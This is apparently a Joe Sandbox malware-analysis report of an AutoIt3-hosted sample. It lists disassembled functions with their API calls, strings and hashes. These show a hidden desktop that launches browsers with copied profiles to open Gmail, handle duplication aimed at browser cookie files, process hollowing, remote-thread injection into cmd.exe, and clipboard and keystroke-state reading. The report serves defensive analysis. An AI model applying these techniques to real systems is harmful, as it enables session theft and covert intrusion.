Opcode Fuzzy Hash: 3676ab9ad1d6e9de47c719f08f51c07c6389f0e1ae3c77bfd215d33d97b63693
Instruction Fuzzy Hash: B6B24838B06219DFFB21EFA8C980AAD73B5EB89308F818555D944AB354EB74FC45CB11

Function 0472B188 Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 0472B208
GetDC.USER32(00000000), ref: 0472B219
CreateCompatibleDC.GDI32(00000000), ref: 0472B22A
CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0472B276
CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 0472B29A
SelectObject.GDI32(?,?), ref: 0472B4F7
SelectPalette.GDI32(?,00000000,00000000), ref: 0472B537
RealizePalette.GDI32(?), ref: 0472B543
SetTextColor.GDI32(?,00000000), ref: 0472B5AC
SetBkColor.GDI32(?,00000000), ref: 0472B5C6
SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,0472B754,?,00000000,0472B776,?,00000000,0472B787), ref: 0472B60E
FillRect.USER32(?,?,00000000), ref: 0472B594

Part of subcall function 04726DEC: GetSysColor.USER32(?), ref: 04726DF6

PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 0472B630
CreateCompatibleDC.GDI32(00000028), ref: 0472B643
SelectObject.GDI32(?,00000000), ref: 0472B666
SelectPalette.GDI32(?,00000000,00000000), ref: 0472B682
RealizePalette.GDI32(?), ref: 0472B68D
SetTextColor.GDI32(?,00000000), ref: 0472B6AB
SetBkColor.GDI32(?,00000000), ref: 0472B6C5
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0472B6ED
SelectPalette.GDI32(?,00000000,000000FF), ref: 0472B6FF
SelectObject.GDI32(?,00000000), ref: 0472B709
DeleteDC.GDI32(?), ref: 0472B724

Part of subcall function 047279B0: CreateBrushIndirect.GDI32(?), ref: 04727A5A

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
String ID:
API String ID: 1299887459-0
Opcode ID: bc7dd5f149a1e66066581b679bdb44e6573aefa87065b035895726357019469c
Instruction ID: 60a9b3eca488c5bbdaad57bf3d89e74a2bf70381dfe1ee674039c1a0f66f3f64
Opcode Fuzzy Hash: bc7dd5f149a1e66066581b679bdb44e6573aefa87065b035895726357019469c
Instruction Fuzzy Hash: 1012F675A00218AFDB10EFA8CA84F9EB7B8EB08314F118555FA54EB391D774F941CB60

Function 00CB4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00CD0980), ref: 00CB465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 00CB466A
GetClipboardData.USER32(0000000D), ref: 00CB4672
CloseClipboard.USER32 ref: 00CB467E
GlobalLock.KERNEL32(00000000), ref: 00CB469A
CloseClipboard.USER32 ref: 00CB46A4
GlobalUnlock.KERNEL32(00000000), ref: 00CB46B9
IsClipboardFormatAvailable.USER32(00000001), ref: 00CB46C6
GetClipboardData.USER32(00000001), ref: 00CB46CE
GlobalLock.KERNEL32(00000000), ref: 00CB46DB
GlobalUnlock.KERNEL32(00000000), ref: 00CB470F
CloseClipboard.USER32 ref: 00CB481F

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 33d5d6ade5f5b49315cd96c1bdaaf94118878fe72906da02dcde96c81fa99b00
Instruction ID: 703a17a1a6eac8f2b99b144679063c4a35b26d93c38186cb2c3a3bc665945d92
Opcode Fuzzy Hash: 33d5d6ade5f5b49315cd96c1bdaaf94118878fe72906da02dcde96c81fa99b00
Instruction Fuzzy Hash: F251C231249201AFD704EF64DC8AFAE77A8EF84B01F14052AF956D21E2DF30D909DB66

Function 04742170 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 133processthreadCOMMON

Download Yara Rule

APIs

OpenDesktopA.USER32(virtualdesk,00000000,000000FF,10000000), ref: 0474227D
CreateDesktopA.USER32(virtualdesk,00000000,00000000,00000000,10000000,00000000), ref: 047422A2
SetThreadDesktop.USER32(00000000,00000000,0474235A), ref: 047422B2
CreateProcessA.KERNEL32(00000000,00000000,?, --mute-audio --disable-audio --new-window --disable-3d-apis --disable-gpu --disable-d3d11 ,?,04742530,?,04742524,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0474232D

Strings

\dark\User Data", xrefs: 0474225D
--mute-audio --disable-audio --new-window --disable-3d-apis --disable-gpu --disable-d3d11 , xrefs: 04742306
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, xrefs: 04742243
\dark\Brave-Browser\User Data", xrefs: 0474221B
C:\Program Files\Google\Chrome\Application\chrome.exe, xrefs: 047421BC
D, xrefs: 047422C6
--user-data-dir=", xrefs: 047421C6, 0474220B, 0474224D
C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe, xrefs: 04742201
\dark\Chrome\User Data", xrefs: 047421D6
virtualdesk, xrefs: 04742278, 0474229D, 047422DA
https://mail.google.com/mail/u/0/#inbox, xrefs: 0474219E

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Desktop$Create$OpenProcessThread
String ID: --mute-audio --disable-audio --new-window --disable-3d-apis --disable-gpu --disable-d3d11 $--user-data-dir="$C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe$C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe$C:\Program Files\Google\Chrome\Application\chrome.exe$D$\dark\Brave-Browser\User Data"$\dark\Chrome\User Data"$\dark\User Data"$https://mail.google.com/mail/u/0/#inbox$virtualdesk
API String ID: 1654231886-2641536602
Opcode ID: 6dbbac19c0ccfe016c2f0fc1d73c8beae492f820277b2c1f4f9f68f36c0a61a4
Instruction ID: 4aa0093d154632e2d68f3d82f39ac5de95fa7f0fc7ad8b0bc1fec296ecc17a07
Opcode Fuzzy Hash: 6dbbac19c0ccfe016c2f0fc1d73c8beae492f820277b2c1f4f9f68f36c0a61a4
Instruction Fuzzy Hash: F5514671A40308ABFB00EBE4DC41B9EB7B9EB94744F6040A5F644B7745EB74B9118F19

Function 0179BD35 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0179BD52
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 0179BD63
lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 0179BD97
lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 0179BE08
lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 0179BE43
FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 0179BE56
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 0179BE63
lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 0179BE6F
lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 0179BEA3
lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 0179BEAF
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 0179BED8

Strings

GetLongPathNameA, xrefs: 0179BD5D
\, xrefs: 0179BE81
kernel32.dll, xrefs: 0179BD4D

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: ff4256313d0894d98b597864afdb6c64e8b16a2792d352a187f8ae130968999c
Instruction ID: adef437c3f3ff4a8222facc4be8f162d80a74e9f02c86cff9e07630e021bd7cb
Opcode Fuzzy Hash: ff4256313d0894d98b597864afdb6c64e8b16a2792d352a187f8ae130968999c
Instruction Fuzzy Hash: 08511A71D0061DAFDF11DBE8EC88EEEF7B8AF49304F1405A6E215E7241D774AA488B91

Function 046F5974 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 046F5991
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 046F59A2
lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 046F59D6
lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 046F5A47
lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 046F5A82
FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 046F5A95
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 046F5AA2
lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 046F5AAE
lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 046F5AE2
lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 046F5AEE
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 046F5B17

Strings

GetLongPathNameA, xrefs: 046F599C
\, xrefs: 046F5AC0
kernel32.dll, xrefs: 046F598C

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 9301ab26dcd38d12fa7faec2f2c6876f5874637dcdc93dd7f63fef467897e1e1
Instruction ID: 1ded81290ea107e264f1f0c56ac248f0c13eab615907c195372b528442fd4a53
Opcode Fuzzy Hash: 9301ab26dcd38d12fa7faec2f2c6876f5874637dcdc93dd7f63fef467897e1e1
Instruction Fuzzy Hash: D9513F71E00159EFDB11DBE8CC89AEFB7B8BF09354F140596E295E7241E730AE408B68

Function 0471AF84 Relevance: 22.7, APIs: 15, Instructions: 241memorythreadprocessCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,0471B295), ref: 0471B004
OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,0471B295), ref: 0471B0F4
InitializeProcThreadAttributeList.KERNELBASE(00000000,00000001,00000000,?), ref: 0471B106
GetProcessHeap.KERNEL32(00000000,?,02000000,00000000,00000000,00000000,0471B295), ref: 0471B111
RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0471B117
InitializeProcThreadAttributeList.KERNELBASE(00000000,00000001,00000000,?), ref: 0471B12A
UpdateProcThreadAttribute.KERNELBASE(?,00000000,00000000,?,00000004,00000000,00000000), ref: 0471B145
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00080004,00000000,00000000,?,?,00000000,00000001,00000000,?,02000000,00000000), ref: 0471B17C
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 0471B19C
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00080004,00000000,00000000,?,?,00000000), ref: 0471B1C4
ReadProcessMemory.KERNEL32(?,?,?,00001000,?,?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00080004), ref: 0471B1F3

Part of subcall function 0471B2A4: GetCurrentProcessId.KERNEL32(?,00000000,0471B4F8,?,00000000), ref: 0471B31A
Part of subcall function 0471B2A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0471B4F8,?,00000000), ref: 0471B3E7
Part of subcall function 0471B2A4: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 0471B3FF

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Process$AttributeProcThread$CreateCurrentHeapInformationInitializeListMemoryQueryRead$AllocateOpenUpdate
String ID:
API String ID: 747061493-0
Opcode ID: dca63f402f9170caff69a49da962cd5aafea1d0d144d998e62efa5cf2d136bee
Instruction ID: 4be21ba7fea6e79afbd3e505ba5d830b729f0cac224871797a9b2537627145d0
Opcode Fuzzy Hash: dca63f402f9170caff69a49da962cd5aafea1d0d144d998e62efa5cf2d136bee
Instruction Fuzzy Hash: 5D910C71A10218AFEB00EBA8CD81FDEB7B8BF48704F504069F644E7650EB74BE458B65

Function 00C988CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C98E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C98E3C
Part of subcall function 00C98E20: GetLastError.KERNEL32(?,00C98900,?,?,?), ref: 00C98E46
Part of subcall function 00C98E20: GetProcessHeap.KERNEL32(00000008,?,?,00C98900,?,?,?), ref: 00C98E55
Part of subcall function 00C98E20: HeapAlloc.KERNEL32(00000000,?,00C98900,?,?,?), ref: 00C98E5C
Part of subcall function 00C98E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C98E73

Part of subcall function 00C98EBD: GetProcessHeap.KERNEL32(00000008,00C98916,00000000,00000000,?,00C98916,?), ref: 00C98EC9
Part of subcall function 00C98EBD: HeapAlloc.KERNEL32(00000000,?,00C98916,?), ref: 00C98ED0
Part of subcall function 00C98EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C98916,?), ref: 00C98EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C98931
_memset.LIBCMT ref: 00C98946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C98965
GetLengthSid.ADVAPI32(?), ref: 00C98976
GetAce.ADVAPI32(?,00000000,?), ref: 00C989B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C989CF
GetLengthSid.ADVAPI32(?), ref: 00C989EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C989FB
HeapAlloc.KERNEL32(00000000), ref: 00C98A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C98A23
CopySid.ADVAPI32(00000000), ref: 00C98A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C98A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C98A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C98A95

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: f9be4729cbd4e222b7e3d182312ba0f9bcc653dd19ea7a10d071c39d596fb1e8
Instruction ID: 245edd1f3bb640c358b5cd83664954815a167da3fb7ca118055f6f1a58f3b457
Opcode Fuzzy Hash: f9be4729cbd4e222b7e3d182312ba0f9bcc653dd19ea7a10d071c39d596fb1e8
Instruction Fuzzy Hash: 0B61387590020ABFDF00DFA5DC49BAEBB79FF45300F14816AE925A7290DB359A09DB60

Function 0474A584 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 272filestringtimeCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0474AA2C,?,?,?,?,00000000,00000000), ref: 0474A5E5
lstrcmpW.KERNEL32(00000000,0474AA48,00000000,?,00000000,0474AA2C,?,?,?,?,00000000,00000000), ref: 0474A618
lstrcmpW.KERNEL32(00000000,0474AA4C,00000000,0474AA48,00000000,?,00000000,0474AA2C,?,?,?,?,00000000,00000000), ref: 0474A62B
FileTimeToLocalFileTime.KERNEL32(?,?,00000000,0474AA4C,00000000,0474AA48,00000000,?,00000000,0474AA2C,?,?,?,?,00000000,00000000), ref: 0474A643
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0474A6DD
FindNextFileW.KERNEL32(00000000,?,00000000,0474AA48,00000000,?,00000000,0474AA2C,?,?,?,?,00000000,00000000), ref: 0474A984
FindClose.KERNEL32(00000000,00000000,?,00000000,0474AA48,00000000,?,00000000,0474AA2C,?,?,?,?,00000000,00000000), ref: 0474A992

Part of subcall function 046F816C: CharLowerBuffW.USER32(00000000,00000000,?,?,00000000,0474A89C,?,?,?), ref: 046F8196

Strings

c:\windows, xrefs: 0474A853
Folder||, xrefs: 0474A808
|File|, xrefs: 0474A918
%.2d/%.2d/%.4d %.2d:%.2d, xrefs: 0474A6BA, 0474A754

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: File$Time$Find$Locallstrcmp$BuffCharCloseFirstLowerNext
String ID: %.2d/%.2d/%.4d %.2d:%.2d$Folder||$c:\windows$|File|
API String ID: 627796702-3011307534
Opcode ID: ed7344f51e00c3507698b7f9b7fc214d019818946a3db7fc64f293ae8ba0086c
Instruction ID: 2ec5c6793043202e744a5f0a1610a195b5ecd0fd9f40fb1a188697b2191c709b
Opcode Fuzzy Hash: ed7344f51e00c3507698b7f9b7fc214d019818946a3db7fc64f293ae8ba0086c
Instruction Fuzzy Hash: 5DC13F74A4026D9BEF20EB64CD88BEEB7B9AF44304F5041E9D548A7250EB34BE85CF54

Function 047444C8 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 174nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000010,?,00100000,?), ref: 0474450F
NtDuplicateObject.NTDLL(00000000,?,000000FF,04752FE0,00000000,00000000,00000002), ref: 047445B4
NtClose.NTDLL(00000000), ref: 047445D5

Part of subcall function 04744420: NtQueryObject.NTDLL(00000000,00000002,00000000,000003E8,?), ref: 0474443D
Part of subcall function 04744420: NtQueryObject.NTDLL(00000000,00000002,00000000,?,00000000), ref: 04744457

NtClose.NTDLL(00000000), ref: 04744602
NtClose.NTDLL(00000000), ref: 0474460D
NtClose.NTDLL(00000000), ref: 0474463A
NtClose.NTDLL(00000000), ref: 04744645

Strings

\cookies, xrefs: 0474468F
cookies-journal, xrefs: 0474467E

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Close$ObjectQuery$DuplicateInformationSystem
String ID: \cookies$cookies-journal
API String ID: 1689247874-3437292708
Opcode ID: f40318cb2ab81c3e6cab48b0a10c6735cc9ff3f606f938cdf23060002908ddd9
Instruction ID: b8898c347b9ef310dc5370b917ba3d94bfdcf702467a16b0e6e822ddf6e482fc
Opcode Fuzzy Hash: f40318cb2ab81c3e6cab48b0a10c6735cc9ff3f606f938cdf23060002908ddd9
Instruction Fuzzy Hash: 0661A171600204AFE791EFA8EC44BBD73E8EB85718F1081A9E900AB391D7B8BD41DF54

Function 0471B2A4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 180sleepprocessnativeCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,0471B4F8,?,00000000), ref: 0471B31A
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0471B4F8,?,00000000), ref: 0471B3E7
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 0471B3FF
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,00000000,?,00000018,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 0471B427
ReadProcessMemory.KERNEL32(?,?,?,00001000,?,?,?,?,00000004,?,?,00000000,?,00000018,?,00000000), ref: 0471B456
WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 0471B4A8
ResumeThread.KERNEL32(?,?,?,00000000,00000000,?), ref: 0471B4B1
Sleep.KERNEL32(000001F4,?,?,?,00000000,00000000,?), ref: 0471B4BB
GetTickCount.KERNEL32 ref: 0471B4C0

Strings

D, xrefs: 0471B3B3

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Process$Memory$Read$CountCreateCurrentInformationQueryResumeSleepThreadTickWrite
String ID: D
API String ID: 4190092080-2746444292
Opcode ID: 5aef1bda1d7014e386a53dabacc0963420140c2ab57b249e57eeb8f96b9d3df7
Instruction ID: cc4284e5b0210128672054548d895551c4fa845fc6d7cc4c91a124d1e229d99f
Opcode Fuzzy Hash: 5aef1bda1d7014e386a53dabacc0963420140c2ab57b249e57eeb8f96b9d3df7
Instruction Fuzzy Hash: D061C071E0015C9FEB04EBA8CD41BDEB7B9AF48314F544069E244F7650EB74BA858B64

Function 00CC0A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC040D,?,?), ref: 00CC1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC0B0C

Part of subcall function 00C44D37: __itow.LIBCMT ref: 00C44D62
Part of subcall function 00C44D37: __swprintf.LIBCMT ref: 00C44DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CC0BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CC0C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CC0E82
RegCloseKey.ADVAPI32(00000000), ref: 00CC0E8F

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 7a25759c18ee8a23e95ba18f2d343fae4fe98245f4f3aaa4e09a835ff4622465
Instruction ID: 08597689fcde2ae818ac0b3c5ac92cd5ede84e1e1e7190d0f735f6dd09481375
Opcode Fuzzy Hash: 7a25759c18ee8a23e95ba18f2d343fae4fe98245f4f3aaa4e09a835ff4622465
Instruction Fuzzy Hash: 27E13A31204210EFCB14DF29C895F2ABBE5EF89714F14896DF89ADB261DA30ED05DB52

Function 00CA0508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00CA0530
GetAsyncKeyState.USER32(000000A0), ref: 00CA05B1
GetKeyState.USER32(000000A0), ref: 00CA05CC
GetAsyncKeyState.USER32(000000A1), ref: 00CA05E6
GetKeyState.USER32(000000A1), ref: 00CA05FB
GetAsyncKeyState.USER32(00000011), ref: 00CA0613
GetKeyState.USER32(00000011), ref: 00CA0625
GetAsyncKeyState.USER32(00000012), ref: 00CA063D
GetKeyState.USER32(00000012), ref: 00CA064F
GetAsyncKeyState.USER32(0000005B), ref: 00CA0667
GetKeyState.USER32(0000005B), ref: 00CA0679

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: db56adb565481ed084fead865ca036e42b32ac5eea28453d6dcd2793ee6eaed8
Instruction ID: 456aea7643bf904a3a79ad8709455f96b06b251133fa7bed40c3bdd3e182e0b8
Opcode Fuzzy Hash: db56adb565481ed084fead865ca036e42b32ac5eea28453d6dcd2793ee6eaed8
Instruction Fuzzy Hash: 8F41C9209047CB5DFF3086A488043B9BFA06B5338CF28415AEDD5475C1EB949BD8CB96

Function 0471DCB8 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174processinjectionmemoryCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,00000000,0471DEA1), ref: 0471DD63
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 0471DD83
OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,0471DEA1), ref: 0471DDA1
VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,00001000,00000040,001F0FFF,00000000,?,00000000,0471DEA1), ref: 0471DDE4
WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00001000,00000040,001F0FFF), ref: 0471DE57
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0471DE6D
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00001000,00000040,001F0FFF,00000000,?,00000000,0471DEA1), ref: 0471DE79

Strings

D, xrefs: 0471DD2E
cmd.exe, xrefs: 0471DD0A

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Process$Create$AllocCloseHandleMemoryOpenRemoteThreadVirtualWrite
String ID: D$cmd.exe
API String ID: 1146768790-2919368343
Opcode ID: 64f6196a8898bf6a669734682f5e013a809aa4f76c5153f940fbfc595bb0ba8c
Instruction ID: 2aa5dd468a5c2a50993096b2afa4ea293c48781ca9c0e188c49345497b5bc3f3
Opcode Fuzzy Hash: 64f6196a8898bf6a669734682f5e013a809aa4f76c5153f940fbfc595bb0ba8c
Instruction Fuzzy Hash: 62515471A40218BAFB21EBA8CC41FEF77B89F54714F104065E650B7290E7B4B9458B69

Function 00CA443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00CA4451
__swprintf.LIBCMT ref: 00CA445E

